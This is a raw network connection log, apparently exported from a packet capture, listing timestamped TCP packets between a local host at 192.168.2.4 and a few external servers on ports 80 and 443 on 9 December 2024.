                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.754231930 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.754271030 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.754605055 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.754667044 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.754724979 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.754767895 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.755642891 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.755687952 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.755733967 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.755811930 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.756668091 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.756762028 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.756808043 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.757734060 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.757790089 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.757812977 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.757863045 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.758698940 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.758745909 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.758867979 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.758910894 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.759774923 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.759872913 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.759907961 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.759918928 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.760797977 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.760853052 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.760860920 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.760905981 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.764355898 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.764367104 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.764378071 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.764388084 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.764400005 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.764403105 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.764410973 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.764425993 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.764452934 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.765412092 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.765573025 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.765584946 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.765613079 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.766391039 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.766433001 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.766578913 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.766673088 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.766680002 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.767488003 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.767498016 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.767541885 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.767564058 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.768511057 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.768558979 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.768693924 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.768784046 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.769474030 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.769522905 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.769653082 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.769699097 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.770319939 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.770329952 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.770382881 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.771038055 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.771100044 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.771176100 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.771359921 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.772088051 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.772130966 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.772186995 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.772227049 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.773093939 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.773250103 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.773299932 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.774110079 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.774120092 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.774174929 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.775115013 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.775163889 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.775249004 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.775290966 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.776290894 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.776345015 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.777261972 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.777273893 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.777308941 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.777798891 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.777854919 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.778186083 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.778351068 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.778399944 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.779355049 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.779517889 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.779561043 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.780247927 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.780384064 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.780428886 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.781251907 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.781296968 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.781384945 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.781506062 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.783639908 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.783689976 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.784672976 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.784722090 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.840827942 CET49806443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.840868950 CET44349806104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.840950012 CET49806443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.841330051 CET49806443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:21.841345072 CET44349806104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.068847895 CET44349806104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.068928957 CET49806443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.070151091 CET49806443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.070163965 CET44349806104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.070365906 CET44349806104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.071985006 CET49806443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.072081089 CET49806443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.072113037 CET44349806104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.661761045 CET4980780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.781069994 CET8049807185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.782063961 CET4980780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.805737972 CET4980780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.925076962 CET8049807185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.978106976 CET44349806104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.978178024 CET44349806104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.978224039 CET49806443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.992996931 CET49806443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:23.993005991 CET44349806104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:24.014112949 CET4978780192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:24.014350891 CET4981380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:24.133645058 CET8049813185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:24.133729935 CET4981380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:24.133781910 CET8049787185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:24.133835077 CET4978780192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:24.134639978 CET4981380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:24.253886938 CET8049813185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:24.391295910 CET49814443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:24.391318083 CET44349814104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:24.391379118 CET49814443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:24.391721010 CET49814443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:24.391731024 CET44349814104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.145804882 CET8049807185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.147000074 CET4980780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.149343967 CET4980780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.268599033 CET8049807185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.467751980 CET8049813185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.467840910 CET4981380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.470582962 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.470906973 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.590243101 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.590323925 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.590446949 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.590647936 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.590706110 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.594129086 CET8049807185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.594206095 CET4980780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.602900982 CET44349814104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.602979898 CET49814443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.604115963 CET49814443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.604125977 CET44349814104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.604319096 CET44349814104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.605964899 CET49814443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.606136084 CET49814443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.606159925 CET44349814104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.606228113 CET49814443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.606235981 CET44349814104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:25.709701061 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.514719963 CET44349814104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.514799118 CET44349814104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.514863014 CET49814443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.573710918 CET49814443192.168.2.4104.21.48.1
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.573725939 CET44349814104.21.48.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.921914101 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.921926022 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.921964884 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922003031 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922203064 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922249079 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922288895 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922329903 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922367096 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922406912 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922801971 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922848940 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922945023 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922952890 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.923000097 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.923013926 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.923584938 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.923624992 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.923655987 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.923702002 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.041273117 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.041335106 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.041412115 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.041507006 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.045384884 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.045452118 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.047099113 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.047228098 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.047280073 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.114389896 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.114455938 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.114491940 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.114535093 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.118597031 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.118658066 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.118726969 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.118768930 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.126976013 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.127149105 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.127197981 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.135310888 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.135397911 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.135425091 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.135467052 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.143660069 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.143734932 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.143765926 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.143809080 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.152112007 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.152169943 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.152209997 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.152251005 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.160336971 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.160443068 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.160506010 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.168699026 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.168843031 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.168905973 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.177081108 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.177164078 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.177186966 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.177200079 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.184648037 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.184694052 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.184756994 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.184796095 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.192275047 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.195977926 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.279601097 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.279612064 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.279649019 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.279665947 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.281853914 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.281940937 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.281981945 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.306546926 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.306616068 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.306677103 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.306917906 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.308784962 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.308832884 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.308868885 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.308914900 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.313318014 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.313431978 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.313472033 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.313555956 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.317765951 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.317820072 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.317846060 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.317900896 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.322196007 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.322246075 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.322273970 CET8049815185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.322319984 CET4981580192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.326656103 CET8049815185.215.113.16192.168.2.4
